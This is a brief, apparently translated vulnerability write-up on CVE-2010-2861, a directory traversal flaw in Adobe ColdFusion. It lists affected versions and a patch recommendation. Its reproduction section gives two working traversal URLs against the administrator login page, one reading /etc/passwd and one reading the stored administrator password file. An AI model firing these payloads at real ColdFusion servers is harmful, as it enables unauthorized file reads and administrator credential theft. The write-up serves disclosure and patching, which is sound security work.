Coldfusion file read holes (CVE - 2010-2861)

Disclaimer: All my articles are for technical sharing, please do not use them illegally for other purposes, otherwise you will be responsible for the consequences.

Vulnerability description

CVE-2010-2861

Adobe ColdFusion is a dynamic Web server product of Adobe Corporation of the United States. Its running CFML (ColdFusion Markup Language) is a programming language for Web applications.

A directory traversal vulnerability exists in Adobe ColdFusion 8 and 9 that could allow unauthorized users to read arbitrary files on the server.

Vulnerability impact

ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4

Vulnerability recurrence

1. Direct access to http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en, you can read the file /etc/passwd

2. Read the background administrator password http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en

Decrypt password

Bug fixes

Patch, upgrade version